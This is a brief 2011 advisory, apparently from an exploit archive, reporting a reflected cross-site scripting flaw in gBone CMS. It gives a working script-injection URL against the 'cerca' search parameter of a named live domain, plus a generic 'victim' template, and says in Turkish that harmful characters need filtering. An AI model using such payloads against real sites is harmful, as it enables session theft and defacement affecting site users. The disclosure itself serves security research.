<------------------- header data start ------------------- >

# Application Name: gBone CMS Cross Site Scripting Vuln.

# Author : expulse ~ Bug Researchers

# Date : 09.07.2011

# Demo: http://www.gbone.it/cerca.php?cerca=<script>alert(document.domain)</script>&sezione=rapida

# Vuln Type : Reflected XSS

# Fixed : Zararli Karakterler Filitrelenmelidir.


< -- bug code start -- >

http://victim/cerca.php?cerca=XSSAttack]&sezione=rapida

< -- bug code end of -- >

< ------------------- header data end of ------------------- >